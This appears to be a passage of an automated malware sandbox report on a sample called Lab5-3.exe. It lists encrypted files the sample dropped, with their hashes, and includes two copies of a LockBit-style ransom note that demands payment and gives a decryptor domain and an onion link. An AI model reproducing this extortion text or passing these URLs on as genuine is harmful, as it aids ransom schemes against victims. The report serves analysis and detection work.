                                                                                                          Preview:..X....K..smY..-j.....g...2....U.O...wp.....=..B......Lx../.w.#?9...Q... b..M..n.....o ?.,/0..26M4..m..w[..._...."9.$.v..+....T....>..}.?`e....]......k....%..x$..=[]...K....M3..6.............4E..Rbo.JA.W.X.T....G.`.R.s.H{..:\.)..u...2m.....*/..L..L...../..``.9......w..JY...{A$...<." .....=.....I..r.....%...g....0.P.}..*........uI`.".9l..#.S+.5f3K]......7.....i%.[y..f..c1.../..)H.<.Z<\a.E......x...>;...MQ6g..(..i....i...$y(...u....Jp'`|.......k......k:.p..Up....A....QP..eE.w:. ~W=.u%.`&..5...d.L^u..o.s...$o........rcH....2..l0nG.o..cXl..........7."..|.....|]I.$w..K.N..O.;u..AAX....)|..gY.e.z..W...m..CK.....c.E.q.....4.o.ie.N;....{.,....9#.:.?.1...5.....~..ue.!yHz....qa....K....5..U.......l...s.0._.u.v....\....t..T..f...._.......^.@.L.@..[..f$....3..%.8..|m.Q.:;U8f.W_..+..f'Y.T....RM....Ezfs{..y.}...*.B3<T?.'%..rv4.iJ.....u..q.......p.m.B`/d...|>........K....M0Y..np.n...K.U.Y..S.D.f.>.r...Z..<<.`..q..,.P......".T..D....-B.dd.D@*i:a...K.r.^8@.b..S
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.928478229268295
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:t5z/XMhaxLzT3g3nmiLxdOxSSzHfUTid3hBaUoSGFcmeykEdEElU92i:f/8IxL33g7/VLGx0uKeY2ElUJ
                                                                                                          MD5:1AE0C4DBC7A40BE228BCB42728015216
                                                                                                          SHA1:1EB5E46BCA4443D821A8FBF5EB68720DFAD45D41
                                                                                                          SHA-256:9E3B6FF4B693F7DDBD7631F3D8EEB6322459B4B55DB1BB0A5FE4FE3FC1B23D57
                                                                                                          SHA-512:A43EC1D59E4A69B7B65241CE536D0658D0414EF8A1C5A788C1993E86F7DB760C9C0D0C22F757E3E9DC726A80980E031FF9AA6F783169DFC7479A51D455FF34D0
                                                                                                          Malicious:false
                                                                                                          Preview:aC%9|.U.U.&.........n.U=$.L#y..@6j...$......1...\....m..4.d..O.+._"...O...#!..b.u.K0..|Zi..{.>.{Py..'.D.k|.n..v:.......Xlz..........v....p+...48.,.j.F.VY..@..ZN}&.Z.z.c.....a.M.(..J.U.g.p..fZ ....#.d..^..."..|......W.Y..(..<6...V..2.....H.hRON......~h.t.....14.y..4ah.`Q.....3!c(.R5:....i...........i.x...b.O-f..9........\..e.+.._......o.......P.J...D.X.|?....R&S8..hc..6.+r..(.VP._....<.0.S..y77$..l.K.^.o....,.g.fY{........=...:.;.zl.'....P<..Np...:..w...*.Pm.^..X.-Y...8)...k.S..1.O.,).7...,.k.R.xKJ...H..s.0...W..6^.z..S......Y......2.Tm.7.f......i..O...o..G.p'."..>.;...j...k...wn.....0,6.[7.4..<ep....=y.c.............@...D.db...Y..j..$h......]/...w.BX=.F..s...l...Ki.|.Tw.0..;../l.i.....&..4..+.W.Oi..7.N...>.@....!..X...@...U..7k.9.z.c2...L..._5..R&Q..eq17G.Ry."..8..[..>.....?....+...g..}........~#....5K..y.60X...A.,b.+.Z.K-.XX..`.A.`.c.}.%5+.>w.....Q...Y............eKW.x^..D.0......>2s@.:mo.D*.J............... .Z..lt.n. .*...;.."..5..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.932240776069966
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8VMs11NuXnJ5HTs8c0yeUeqHfUTid3hBaUoSGFcmeykEdEElU92i:8VM6Du55zs8cQUeGx0uKeY2ElUJ
                                                                                                          MD5:3DC6CF8E4EF6CEA5F467D6EF17297D5A
                                                                                                          SHA1:DACECD8B21236AE636B7FD5CBD4617B367B3C64E
                                                                                                          SHA-256:4FCCFCBDE4A77847131143F6FDF8FFBA562F53759C2834D14612ADF74D22B373
                                                                                                          SHA-512:DD4EBFDCA735694B2F27A6BE27427C65AA02ABAE53C81B009ED827D807ED2730B5B1D0AADAA985FA3B968E27FEFF3D86AC4B08415ADE1C1B57BFC609103D1309
                                                                                                          Malicious:false
                                                                                                          Preview:'`JR....c....N.+..3.4J....u.Q..lB..ggV/nm.n.,....k.6P.C.J.b....Ed.v.....K....Tj.Y..;.J.t4^.......s.e.u..~.a....~(v..V..hs|.o.. 0.'.OF2..l;9...a..N..9...xP.9....E.."`..R.$.).4CQ@.......g...LK.m..%.M~.w.....D..1g}.1r.9.<j|.W{z.(...?G&.F.X.B>Y.z7....p81....$.,)1.`.>W.U.b.z......,f..c...a\....ukn_OA..K|.."........"'.<.x...~T_.....0.54.F.T.J.i....r..B......fF.......D...}sP....])S....WR.}.0Y.L!.}..2..M.]..'..]t.....@.qG..w./u:...&@D.d..d....o......t#"n......b.D3|....J.b=+d.?...`...9W.....SUy...D..k.kE)..x......H.9..Zx..=....L.y).\m..W..#.-...P...DHg.Tk.0D%$L..p.n.S.>...S9...C...c.T.!...;.hL..K&e..T......P..r.X8".......8...q...;..?...t.N]@=.y..I..f...VjG..A.5.....7..g........m..."W...O....U4._.i.[.2.Q)Mk..^....D.{.|..f....R........]r.?..jN|...d.....X.3|..hb./.T.[..k...[.j.nrN.s.c....=-.....x.....c ..q..;.}....\..2..fp.~.z0*../.............<V;/z..$J\.P...k.w../?IZ.t.ah...Cq.Xx.,....5..!..A.......!...D....Q.._wx< ..YXkg.e|.2.....^......5....r..*z
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.928559437255042
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:gjcahHGUpfXWH6Jdo93dBLKdRB0M5jHfUTid3hBaUoSGFcmeykEdEElU92i:gj4UpOyo93dpK3wGx0uKeY2ElUJ
                                                                                                          MD5:C90DDB626A2CCE06D5AD887D88EF66C2
                                                                                                          SHA1:FA6BEDAB4774D635055AC9890E102151E6B27199
                                                                                                          SHA-256:FA585B871E08E1587696B03AD0EC410D35AC6EDDEBADED45900980591429C0DB
                                                                                                          SHA-512:7FE5A3F5F12F02D794BAF72C26058CF38C88D24BDF312F86D0026C5E735369C1C5749BD591D8224C2D2C2F399296DD829D37CD87604264921428F4D9EDD9042B
                                                                                                          Malicious:false
                                                                                                          Preview:./jh.K..6L.+..is..rQ.m7..Iq...|.y=( ....S.~....'...r.1'z*.....L...t.'O..F.......KW.... ~..@.4..D.q....5.?..A.<..c...su..9..C...y...t.o.`.2..J..h=../...]..,l.H.|......5..i....$. ...f.(.'.....*..s....TL.A.g...U3..?.).^m.6.D..R}.Er..g....u...a.0.V...).$M......u..........(.....ww.eu...C}.Z.8../..M!.?q#.8.V.lC.@....s..+.y..?.=l@`/..r..j...)#...S...o....d...."A.{.......R.....NQ......yz..J,c.v..+O....o.^..Y9#.2...J..9.3.L...B..."..... ... ........o...3>.|.6..Z..J.US....`*.....q*.}QN.....>".(T.......d>..hU.$...eR.C.#.B....k.r.;\!F2X.)......X..e....mD..^...._..+!.Yz.M.S.Wu...u]...[G..yy..z...K..tW.1`vG...X..n...,.....H...C...w...3.w...1<...>.8L:.D.o....Tp}.CT.t8.+..y..s+.Q?..vX.EN.>..!..i.|.E.F|...l.d....P~^[....5.06.&.X....FUO.....Th..A.w...60.....Uu..x.r.'^...S<.=.....C....J...%W.u.....2.`.e.m.cJdD.O.V..il.x..X=(..'Q.G.["......6.v..%.W.n\.w^.T[d.y...~c.....r.......s<)...hj...s3+>..1j.k*......Q......1...^IMo..+07]Dix.N..}.^5..n..c_...X.h..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9325408045643755
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5XJAruBDjIuQsqLgy4HfUTid3hBaUoSGFcmeykEdEElU92i:xJArujIu29fGx0uKeY2ElUJ
                                                                                                          MD5:E699D3E6B018188E401F34470F9E8D5F
                                                                                                          SHA1:9DE4B8A40BFE0C93672A649C919F067E3D876B86
                                                                                                          SHA-256:50A491090CFD245435D496025A4884039741D1773C33AD9ED36D3669791D26D7
                                                                                                          SHA-512:A717EA3F44FD62A021F6AF03E268F2B2B868754AD6B11C5113BC44245D2D87C1751D522747E4FCF1ABBADF8BB6BBAB9D71E47D035BD37338A87FD7BFF7E9675B
                                                                                                          Malicious:false
                                                                                                          Preview:p..Z...W3}...G......y...<..5Q.!..\W./.hO...L.....c.u..%..r......`y0...`...T8...Z....6m..>. ..L.r~m...<..+Nz...m.[G.^....yl.#..|..2...w..0n....h..yG5.(..+Z...)j.(......C....#.L.P..).*....9.7.XN.%.m.Uj.B.F.}.>Z.dS.3..4...1SN...T...lP..+..>1..x......_(\.B....K..E.^...y..I|.Y...Q.M...........D..`.M..t.WY..x.......a~PO....js}.72C...5.j..7.J3r&3..."Pj..8k^Z.....:?..{n...7N.ol.h..8......G...D..V?.+&\:..(....p.~...3..T)....`]s..=.8P.#..x.Br%..P..;.........n..b[.&s..J.O...d.../]..z.$..#..ET..(aD&.....W.....x....<..(..I%......^....=..OSs..T.(. ...$....".L..B.^;CB..b.6...O.B.MC/....c)......W.{.7........<....K@%...RI.,.G.,.[.@.Iu...........4..%....DO...pM..........$.$...X.....e.w...!.T*+.S.=e.+c....JR...s.......%P....UcCc.....KG....Y.NR.Mp.G...rn.J...9....c.Bdr.........K...Q+..k>....o.?.+...D.7......_.G.l.r.,=g..]./u...Cm..~...A...r...-..w(........X....4....m.*vk.E..$..l........./.Ks.......A.7/e..>$.*.......pX.".....Gc.-...!...}Dz..a)...4.3...)....E.!...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.92679236613041
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:j4GdrwLikx88TyOZSwfK3hEakJjHfUTid3hBaUoSGFcmeykEdEElU92i:j40rwZx8Y2tkJwGx0uKeY2ElUJ
                                                                                                          MD5:E009BD231C970BCDB9FF3BF2DCA9D30E
                                                                                                          SHA1:12E4F30E977F7D9EF9F588EB73A2A8456DF0B218
                                                                                                          SHA-256:FC637AEB40222B030ADD88D9BEFFFD493F576679139059A525A725C588422772
                                                                                                          SHA-512:34CAA853CACBF96103F1E0C2EFC806EDAA77C5F51E7EBA61E3863CA227FD2AAE5DD56F104DFDD13C11022203DE12F8B19507AE998E3E84DD600AFE765B0AACCB
                                                                                                          Malicious:false
                                                                                                          Preview:..?N>`..x0\s.....Q...c.#./..y.h..^..H..V...(.c.t.!....y.....l...........O...X.*....?a+...i..6}.Q..M..c....b}o.%.{?.U.DZ......:o...p...6...I.2YX...x0.?.T,..N.?....!.}j...J.{U5.L.)....M.......Y"....9..T.O.^1..i.......|`}.4.}...5).+[....aZ......9N#...{.oT.....X%\...nH)Xq.%.. ..5@..Y.....P`... L%.A3....>...$~.....1..;..|^$.(.n.....l...l|.aS.l.W.t6qk.X8...d..l=i...9pM...u..z%..y...N..9..$...M.....MdX'.e8.N..~. .)..Xe.h.Z.y.....,.L.."g.}m...e..v..3.C.#..W.;e.?...b.-.|......;.Y..L..eO...Rn.... .C..i....P.z.....,.... D.+..PL.)....N.;.Z^.G..tf.a..@.K.M..Q:`..<.#M...P.mm-.....*..X.m/..;.........>S......3.........U.."y..i....8.k6a..Q.:.N..(U.f1....../..<...-...6.^..J.p,...h?.w...^R*..v.o..m....=....r....x..e.t.H.Om...;...a7B65....:v....+..ba..^h.....o..N'5....tw2..Q.q.....0.f.&`"8..x..n.;...n.+..x.!..P.....K....d|../6..f...#....!*..]X.0...2.xh3.0.Q..Q8c....FD1...5hise...H2...Pr.....+.-.[.V.H.=a..p(V3..B....B:.b4.2......]8..% .}..y. p..uh...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.933588141033447
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xrhB81bgdsEGT6y4E5qCdyb06fmfeRfnKHfUTid3hBaUoSGFcmeykEdEElU92i:9cbC1kfAflGx0uKeY2ElUJ
                                                                                                          MD5:DB8A008270E492A1E4E9CB54D9A3C8ED
                                                                                                          SHA1:3A3752489274E0270FA08D39931228FAA2652361
                                                                                                          SHA-256:BEA23975096C1147A1BFD7905EA6B98D96AB969C49A6DCB3836D360A92543C39
                                                                                                          SHA-512:7870F1EA0ADC5006DC69690DD8DB09E161ACB7DF145EB8428FABEB0620C1497387D280B55A227AFCEF74D780D97B14BB92E19ACC6863AE040733403C6FBD09A1
                                                                                                          Malicious:false
                                                                                                          Preview:a.........V...C.$M......`.Y..._..]...'\...{....[......2.Vnrp.2.a)F.Xm$...&!/79......e..L.-ry...(.6..DN.V.Q.....%......$..,...*......5F'.).R..e.%.a.^T'i.D.18..A.92.U....;.H...IN.">..l..8Q3.^...D.#io:..G...6....QE....ot....]...`?.....]>Q|.rH.LG6L..~.8..9|..$.....A.`_......c...c...I;.D....a.+..a..K..s...(hlL~.`S.r..Z......?.%D{FCf9...q9.P..b....P......).x..t:x.udSV..x.*.v.(..<....7HZ...U....H.K.~(.~._.h..v&....(....u.^..[.(.P..<.....0!u.nk.q..>.Rs.?..[..(.!.v.Iy..OWO8)3.D.`...YcL.E...bH`$.o...#SGN..U....\.qr0ZM?.5{...R.D..<......y..:B.t..../...7..Z.j.v2..&..".]..c.r.).CENZuvU./..h..$..1!O..#o.0.!..s...GG..n.B....qc/..K.\..8H"d.=..d....y.".....NgP....Qf.x.6..?....w..d.......F.......(...?.'H..r....MW{._..C...O)<............*.O%....x.x%...,....Rf..Z.qa.J..s.,.k.5..:f#. ...T.......4;..njmF.-2...{.sIM..d.I.^.`.......@..w:..Kc$.Z.*.7........+..P....N..U..2..)...[[.~,.wj#....eHG.V.....H\.]...z#N..N........._.&*......m#.;.+..m$.8...gG.T
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.931569928908511
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dgK4FF1H6cW7M3+mnHRUGoBnX+iHv9t33AHfUTid3hBaUoSGFcmeykEdEElU92i:2K4FF1acW7MHH6RXZP9t33HGx0uKeY2b
                                                                                                          MD5:F2D45F0827BD30D97CB227FEE1536C2A
                                                                                                          SHA1:EB7F7F07FA79F51696B6127CCE14C3DC28BA6756
                                                                                                          SHA-256:79C78957DE9EC97ABC4FB496BE58106BF3FAC79BCC35CFEA4EFE445E7185EAF7
                                                                                                          SHA-512:A86077B9D32C740E3B543C0CC4BC2344537723FBCE00252F5E2434BF58F13DC72CD75DA1023E9BC1A8868CF11EC5B624023BE549B6A62176674CA56C3B28A987
                                                                                                          Malicious:false
                                                                                                          Preview:..d.=........8>.Zw.}.o...X.U..D..s...>..c.SfRXV=.....G;t....OQ.....!..Z..[u.7..K.....7.#<ej)...f-B.[xO.@^.}.{@.Js.f........cW/F!.E.f.Qw*....^.,....M/..Do.".!.1....4......k.2[.?$s...W.HxE...+..I.......].*.....=......0r..o...5....N.wR.n...L.>...v.............`D..7=#k..Jp.-?..."....d0...s.fp.Y.......w......K..L+oi.B..._\......4..E...|....DZ...)....4f4....+...1...'.d..|.......'(..Pr;.....n2...l....LF.Bl..*4y$'.U..J.....@.&z..X...h.D.........xw.h.....".....O...=...K..Q/...u...B/.-@tL....'..ez.......6.N.x....\aU..WV..-.I&...B.;.D....0...K|....F...J.Aj.}.........7z_.0d...r....By....y6......1...m...NL....].' .c#.YO(.g.^.>.Q}....-N=.O.q.[g..uv....&.....f...N....[..].'57..@u......9"*..._.Z8.......5.....@......^.vp.A...n..3R.~.o.D0.v;.....R...;..`.}..I..T....1Y....'r.z\.ve..D.:...].......4R[....^^.....^.....M.+.Uv.h@I'b..l..&g.,2....#M.,.bW.k.'i.dT..B`4.t.A......N..&M..H.m.(..A22...n.".d_"7..+`.f..'#K....+..h7....5.....W....n.....x.R.B|.!...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.92457678923192
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DHdH0cHswsMr0hOvaLdlI8jHtMoppHfUTid3hBaUoSGFcmeykEdEElU92i:D9UUZsY0hOGTookGx0uKeY2ElUJ
                                                                                                          MD5:3A62C7FBC3D0186ED72FB7B6278C4A4F
                                                                                                          SHA1:8D9710169C5B83989BC0D87E85DBBE8277A3611E
                                                                                                          SHA-256:DBA1710C3D7D11C4C59929994751666EC7742E25C1FCA66DB5D7BD8AF260E802
                                                                                                          SHA-512:22C54DB92FF334CED18DBA020B678F2275654AC21E680BA6D37B05E3B9578D95E39928795E107535EEDB9712ECABAB94C3CC225333A405AA06D6796A9871A481
                                                                                                          Malicious:false
                                                                                                          Preview:.9..f;A....C.TQ.?H..........~.g.9g.E...p33J......Sx. ...(T..6.-.tw....nV..t/.xl.ej.W.O|..L....../...U.e.).hsX...Rh. ..x..[.1..p5....q@......Tc.E."J..^.w.".cnB....\n...@RG....7..2.......Je-......&=.(.....v.m.q..Y..po..I.O..0..........|..^..I.I5.|.)...Sm..Nk.S...C=._.....(.....v........2...F.v...O.;..`....x_....Ae..z.8...........t.o..).....I.*N._@...S.t..#..9..*7....Z......a..in..qpe.B.w05j6..;.@.V..}.T....J..%A.'.....:O;.......>.....H.......EE.\E......u..k^+....Pn...w7...A.j.<..z.9Y,./<.'.......4..C.3d).....}yA..>6.>.XC....&..f."E.l0.9..A..=.sO4..Z.)..FmK..V(.P.....e.MT..{...p...*U@{-.p..?.|*[..K`.5.mj...?d.D.o..E..}....}xm.......2...V.5n.....@....)...{...9...F...^M._...@..5R.?2....o."........z2........4.Nb...~/,......p...T.<. .. ....V..+uK=.cV.......h....J.Su....u?..+XS.y.U|. .W..n..0w.......+.w...p....tJ......8...9.....L.lk XYQ..J..|b..W.=...._A..Kt.eI..w.C.I.T,.O!.=.|.P..B.+..s%..?.?Q.4.....>.h..EN...0.mD.3...3...<...+...oX...g...d.j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.93439748372294
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ngUveO43S6JvMWF8+F12VSjU0p5OorHfUTid3hBaUoSGFcmeykEdEElU92i:nWQ6RMM8+sTVGx0uKeY2ElUJ
                                                                                                          MD5:DA3F305C0900CA28DE17716BC93CDD36
                                                                                                          SHA1:0C066D660CE5A628FEFE67F442749DE42FEB1A6A
                                                                                                          SHA-256:B7C7E82090B9C29DC367BB2160FA3B7ADE4603D0B4C9BDE9B0325004ADB4829E
                                                                                                          SHA-512:8ECB1601429A5BC813AB8F972DAC77AD6B668F3D6D3D89FDB331D3D59A39B0200036223E9EBFD21529404CD393CB58235DE74349DACCA5E6162E635631580E39
                                                                                                          Malicious:false
                                                                                                          Preview:.??|.bm~..D?85.y.lC9.:.-+.....@.@M5{&......'..M(.=.O.....H..;..@......._$.S3"Ji.....wL.M ...<....D."..b ../...D.Z.L..Z_...}!..L.r.K....K.c.....q.Dd...:..3Zv....M..0 O|....Oa>u\..M.5.8..a*./..o.r.F..^...i~@..;.{1.V..'a.z^V.Hm..P.(..>)Hu..4...r.!.....k......"?.#d..pI....)..z...F4..5.X.o...@O.lk....m.....{'......l...02...;...I.1z......u.%..C..>ywu.;..s...$......]Q.daFE-..r ]T.K.GD.q.V...s....vy2x....M"'.....i..r...M.P..rCD...)....f...@.[....z..5.E[.O.5').....J-...;h.'E..9$t..-8.%\NS..d....6.......j..!}.rP..Ow....I.C.>.sS...._B..P0...S.q..jr.|u?-.....eX.td.".(.")iJm.....[....uc6@..M,...>7....E...i...(..vx.....Y.......L.,e.D`p.h..N......@..,.(....(....u.z }..z!..........K.{...\#Vf.B.R.,.a..1.[DYGlu.....f:D..M.9Gh,...Zl...?..G.`s....<Gi........4......o........y.n..7D.I[.....9.+!..:KHK).......Q....~#.v.............I.2J.%t.-...IFg.t......q...w.{...CZ..<sR'Ci.Q......5y.Q....&.w..(......@G..I.X..#.g.4....vG.L3d...'N/.t...To.2..x0{.n0.].->.3:..N..z.M...:.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.936446085653473
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:03epNGVmyDw1dabJHdxtsHfUTid3hBaUoSGFcmeykEdEElU92i:0VsabJ9TGx0uKeY2ElUJ
                                                                                                          MD5:8E7AC0776917C9CA5CE6E11E34524FD6
                                                                                                          SHA1:89DD08F755049220BE829422959ED7B1AC8BA30B
                                                                                                          SHA-256:D5930261A9A8590949D858EC3A4E74E5597B759D95B363F5C13CCB707B185BBF
                                                                                                          SHA-512:24607F6A89007D5C92F20E5F030D9E2B9C052E4215E5FDBE08D19F477E29268C72774FC2C52DE3F31D28899E0578A4FEB0EE695A9C31C39FF218D2971C8113A8
                                                                                                          Malicious:false
                                                                                                          Preview:....*...$..t...cy...|...r,...b^..e%z.J5]..~.3jIz4/.GF}....R.y...EL.[.....*..#q?....+.#r.....=..".......SC....v.X..uT?i...E.Z.*....b.w.4.X.....O..;...Bs.h.A....,>O....G/...s6L..MP f.1...{.T.-l.Q.....v....c=.~'....@.]c.........)U..op.....'..\V}$...H.....7.......U..\6J.`...u..G.......p....R..\.g...#.9.&....Z#,....}-p.5.....D...T.I..l.HP.L....C?....n.f.......%w.......k..vm...6....~.......1P..-[.....X....n....F...j..q.J.....U;{.Tp......J!.r....b.D.Pn..y..."..T...KY.A.G.Gh..3........k.y.P-s.[.......N..@.:_8.......Z......./K.......F........B.;.m.C.U<.wE..:9V.IR..bZ....=.Ix..Pn.R..B.).$s...H........O......AZN._........n...hB0Ogz4..6t...i...*#...=d._..>...f}...hwX%..s..P.iYf.....P....(...K8...5.....L....O..N^.x...c.!k..Q..Z.. .tye....h.3..2..=.O*.O-I..zZ.~..Bl.(..tHa.c.....x....,....B.6..=.y.w.R2.'..../6...1o..#<.c>.....{.,..Wp.....c...Clb.....#>.c.(.w../....|-{...Z.v.......f`...^...~.y.FK.A.}....#.......}.8.....p.}.S...'.!.N.;u.......~)\.]F..4}~U.U..=.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.932464872048521
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4a25oM8gnhyXkl0rpzkaU7rOHfUTid3hBaUoSGFcmeykEdEElU92i:4a2njhy0+9zu/hGx0uKeY2ElUJ
                                                                                                          MD5:3E1D8D4941E6703ECFBBE015830A4937
                                                                                                          SHA1:3C696BE57E047B1DAAB2828D3092A8BF756F8B63
                                                                                                          SHA-256:F5838222507CBB8C62D364EFB31F58A55D7A9C0BD6137D1D7BEABBF0EB5BB772
                                                                                                          SHA-512:C58AC305F88F93CC6D3D192F778AB0C7A8B879C874F2C077BAE9CBA811AC95F264251989177E7E30ECDE488DA7DCB225A2726AE2B1F912F35747F077E0DCAF10
                                                                                                          Malicious:false
                                                                                                          Preview:.m...h8.2.RR.$.(.._"..._?..b..Xo....k.;.[...{.2.L.....my.].?..p'....V;t...A@.xy..)9.p......~...f.g....<..1F....T.r;.S'P..I....>....X..9.........B.O:.).\.U]..e.:sm......;...j.tg...w...%p.pl.g>.:..?...r...#^.f".......:....=..m.P.....z..:}.W.[.w-..1.'.....Zz..a3..oX>.n...%..<.<....B.U.U....8.."...(}....@1....).B.~.q..0.l...V...M.oT....+.F..zY....n8..Q...z/I.<....{N.;.U..=......H{I.st...=..=...s.s....B..:.\#JA.R.d,1V..o....I.....nV..}.sM..wI.UT'..y@...i.B...I..*%M...%qs..T.........Bi"..~...4A;!V....A..!...+,:.A.LV%~.K........6.}.x....r.t...7t.....i..{^.n..5o..v.*..@.....b...k..G.$..z.VI.F...@.'`...v.Kk....;..S.A4.0...12..PGK......0.....t.D..~.`..v.8..j..E..co...oW..]...S.....c`..^..w..1..?.>m&..8.y*...p.{g...5.I...G41.V..^....p.......e.(..DN..%...&.w.[~D..&"..F...H.BS.{.o..C.B;..n..WQ1.......t..."...BYwW..=E....6....6{.d>/..}..d......t.+...V.a...jo..~..L.h.m.a.^.=.u......k.k...).'..Q.lJ..w..} ..L{7A.4m.I.E.....O...8T.'.).[...v.r.b*1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.937798141489111
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:t23InCqrXsmWUAIPRP34otKHfUTid3hBaUoSGFcmeykEdEElU92i:tEFss9lOAoDGx0uKeY2ElUJ
                                                                                                          MD5:B4E959A4689DD9DE9CB69DA12408F680
                                                                                                          SHA1:4D0AF4409FEC996088BCBBB79698F38D7747A38A
                                                                                                          SHA-256:FF71630C33061126748D0BAB935C6E9C555AF296839322AE920980DABAEEEC0F
                                                                                                          SHA-512:62A254D7C8C913163D32193A8B7FA57D4E4F9D58928DD688538A7BE193E60E6421B7E1B5C7B59899301D7A7C7AF223B104AB7110B68CBE28BD5E253E1F5CE97F
                                                                                                          Malicious:false
